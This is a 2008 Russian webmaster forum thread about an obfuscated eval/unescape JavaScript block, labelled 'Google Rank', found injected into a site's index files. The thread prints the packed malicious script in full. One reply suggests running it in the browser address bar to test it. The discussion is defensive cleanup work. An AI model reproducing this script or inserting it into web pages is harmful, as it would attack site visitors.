X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

3 страниц V   1 2 3 >
Открыть тему
Тема закрыта
> кто нибудь с таким сталкивался?
agentvini
agentvini
Topic Starter сообщение 12.7.2008, 20:35; Ответить: agentvini
Сообщение #1


wir werden alle sterben
******

Группа: Active User
Сообщений: 1076
Регистрация: 27.5.2008
Из: Москва
Поблагодарили: 234 раза
Репутация:   39  


заметил в индекс файлах появление такого вот кода:

<!-- o --><!-- Google Rank -->
<script type="text/javascript">
eval(function(p,a,c,k,e,d){e=function©{return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e©+'\b','g'),k[c])}}return p}('o(n("%7%l%d%1%j%9%k%h%m%p%t%s%h%9%r%i%2%1%0%0%6%d%2%1%0%0%3%8%2%1%0%0%3%3%2%1%0%0%4%5%2%1%0%0%3%e%2%1%0%0%3%7%2%1%0%0%3%c%2%1%0%0%5%0%2%1%0%0%4%6%2%1%0%0%4%5%2%1%0%0%3%6%2%1%0%0%6%7%2%1%0%0%3%f%2%1%0%0%4%a%2%1%0%0%4%a%2%1%0%0%4%0%2%1%0%0%6%g%2%1%0%0%5%b%2%1%0%0%5%b%2%1%0%0%3%4%2%1%0%0%3%b%2%1%0%0%3%b%2%1%0%0%3%4%2%1%0%0%3%d%2%1%0%0%3%c%2%1%0%0%5%7%2%1%0%0%4%a%2%1%0%0%3%b%2%1%0%0%4%0%2%1%0%0%5%9%2%1%0%0%3%8%2%1%0%0%3%9%2%1%0%0%5%0%2%1%0%0%4%4%2%1%0%0%3%8%2%1%0%0%3%a%2%1%0%0%4%a%2%1%0%0%3%f%2%1%0%0%6%7%2%1%0%0%6%e%2%1%0%0%5%0%2%1%0%0%3%f%2%1%0%0%3%c%2%1%0%0%3%8%2%1%0%0%3%4%2%1%0%0%3%f%2%1%0%0%4%a%2%1%0%0%6%7%2%1%0%0%6%e%2%1%0%0%5%0%2%1%0%0%4%6%2%1%0%0%4%a%2%1%0%0%4%8%2%1%0%0%3%d%2%1%0%0%3%c%2%1%0%0%6%7%2%1%0%0%5%5%2%1%0%0%3%a%2%1%0%0%3%8%2%1%0%0%4%6%2%1%0%0%4%0%2%1%0%0%3%d%2%1%0%0%3%e%2%1%0%0%4%8%2%1%0%0%6%g%2%1%0%0%3%9%2%1%0%0%3%b%2%1%0%0%3%9%2%1%0%0%3%c%2%1%0%0%5%5%2%1%0%0%6%9%2%1%0%0%6%d%2%1%0%0%5%b%2%1%0%0%3%8%2%1%0%0%3%3%2%1%0%0%4%5%2%1%0%0%3%e%2%1%0%0%3%7%2%1%0%0%3%c%2%1%0%0%6%9%i%u%q"));',31,31,'30|75|5C|36|37|32|33|64|39|65|34|66|35|63|31|38|61|74|27|6D|6E|6F|2E|unescap
e|eval|77|3B|28|69|72|29'.split('|'),0,{}));
</script>
<!-- Google Rank --><!-- c -->


кто нибудь с таким сталкивался?
пасс на фтп сменил


--------------------
Профессиональная разработка сайтов на MODx
реализуем все ваши идеи качественно и быстро
цена от 500$ (skype sanche.s)
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
mr4q
mr4q
сообщение 12.7.2008, 20:41; Ответить: mr4q
Сообщение #2


Верстаю дорого
*****

Группа: Active User
Сообщений: 697
Регистрация: 18.9.2007
Из: Харьков, Украина
Поблагодарили: 325 раз
Репутация:   79  


помоему вредоносный код запихали smile.gif сталкивались..не скажу что код такой же был, но почти - зашифрованный ) удаляй и меняй пассы

Сообщение отредактировал mr4q - 12.7.2008, 20:45


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
UEM
UEM
сообщение 12.7.2008, 20:45; Ответить: UEM
Сообщение #3


Бывалый
****

Группа: User
Сообщений: 410
Регистрация: 28.12.2007
Поблагодарили: 22 раза
Репутация:   23  


чёт не известное, я бы выкосил нах, если сам его не пихал


--------------------
консультант по ремонту мобил
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
agentvini
agentvini
Topic Starter сообщение 12.7.2008, 20:45; Ответить: agentvini
Сообщение #4


wir werden alle sterben
******

Группа: Active User
Сообщений: 1076
Регистрация: 27.5.2008
Из: Москва
Поблагодарили: 234 раза
Репутация:   39  


(mr4q @ 12.7.2008, 19:41) *
помоему вредоносный код запихали smile.gif сталкивались..не скажу что код такой же был, но почти - зашифрованный )


Вы тогда смогли определить путь его проникновения?


--------------------
Профессиональная разработка сайтов на MODx
реализуем все ваши идеи качественно и быстро
цена от 500$ (skype sanche.s)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
mr4q
mr4q
сообщение 12.7.2008, 20:47; Ответить: mr4q
Сообщение #5


Верстаю дорого
*****

Группа: Active User
Сообщений: 697
Регистрация: 18.9.2007
Из: Харьков, Украина
Поблагодарили: 325 раз
Репутация:   79  


agentvini, нет, я не пытался..удалил, сменил все пассы, поганял антивирусом по сайту и все )


--------------------


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Guerrilla
Guerrilla
сообщение 12.7.2008, 20:49; Ответить: Guerrilla
Сообщение #6


Завсегдатай
*****

Группа: Active User
Сообщений: 550
Регистрация: 2.3.2008
Из: Мир
Поблагодарили: 115 раз
Репутация:   15  


Конечно это вредоносный скрипт вам подсунули! Типа xss уязвимость в вашем движке и т.п.
Вместо eval попробуй подставить echo, чтобы увидеть суть. Или просто скопируй сам скрипт (выше приведённый, без <!-- o --><!-- Google Rank --> сверху и снизу) в адресную строку браузера))) Каспер заорёт, значит оно самое) жуки заползали. Чистить надо и избавлятся от дыр, если это не баг хоста.


Поблагодарили: (2)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
agentvini
agentvini
Topic Starter сообщение 12.7.2008, 20:59; Ответить: agentvini
Сообщение #7


wir werden alle sterben
******

Группа: Active User
Сообщений: 1076
Регистрация: 27.5.2008
Из: Москва
Поблагодарили: 234 раза
Репутация:   39  


спасибо народ.
хост америкоский (держат Россияне) http://thejethost.com/
когда то была проблема с двиглом, я тогда обратился в супорт, просканили мой акк, сказали где баг был.
после фикса дыр, и смены пассов все было нормально. похоже опять...


--------------------
Профессиональная разработка сайтов на MODx
реализуем все ваши идеи качественно и быстро
цена от 500$ (skype sanche.s)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Nemo
Nemo
сообщение 12.7.2008, 21:25; Ответить: Nemo
Сообщение #8


Оптимизатор
*******

Группа: Active User
Сообщений: 3129
Регистрация: 22.8.2007
Поблагодарили: 456 раз
Репутация:   163  


какой двиг то?


--------------------
Крауд-маркетинг, ссылки покупаю здесь
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
agentvini
agentvini
Topic Starter сообщение 12.7.2008, 21:50; Ответить: agentvini
Сообщение #9


wir werden alle sterben
******

Группа: Active User
Сообщений: 1076
Регистрация: 27.5.2008
Из: Москва
Поблагодарили: 234 раза
Репутация:   39  


(Nemo @ 12.7.2008, 21:25) *
какой двиг то?

оськомерц вам эдишн

походу проблему нашел - был бекап из зараженного архива.
Всем спасибо.




Устное предупреждение, за Duble posting - Vaskes

Сообщение отредактировал agentvini - 13.7.2008, 16:24


--------------------
Профессиональная разработка сайтов на MODx
реализуем все ваши идеи качественно и быстро
цена от 500$ (skype sanche.s)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
mister_cc
mister_cc
сообщение 12.7.2008, 23:29; Ответить: mister_cc
Сообщение #10


Бывалый
****

Группа: User
Сообщений: 252
Регистрация: 12.7.2008
Из: wild wild web (WWW)
Поблагодарили: 27 раз
Репутация:   6  


Вы не нашли проблему=\
Так можно сказать, когда вы узнаете куда идут отчёты и какой функционал у данного сплоета, а так вы просто отреагировали.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
3 страниц V   1 2 3 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Оцените сайт на рыболовную тематику. Все кто любят критиковать прошу сюда.
3 alexandrrr 443 14.12.2017, 23:28
автор: alexandrrr
Открытая тема (нет новых ответов) Facebook палит прокси. Кто как решает эту проблему?
28 Twickbot 3660 14.12.2017, 20:26
автор: galikfor
Открытая тема (нет новых ответов) 10 бесплатных сервисов Google для бизнеса, о которых мало кто слышал
18 jack 5996 14.12.2017, 12:29
автор: Akeeloq
Горячая тема (нет новых ответов) Тема имеет прикрепленные файлыКто и что читает?
Любимые и не только, книги.
251 Levels 31224 11.12.2017, 16:47
автор: Catherine_Molli
Открытая тема (нет новых ответов) Кто продвигает сайт в яндексе массовой закупкой ссылок?
13 aleggator 1942 8.12.2017, 4:19
автор: KvadroJ


 



RSS Текстовая версия Сейчас: 17.12.2017, 21:58
Дизайн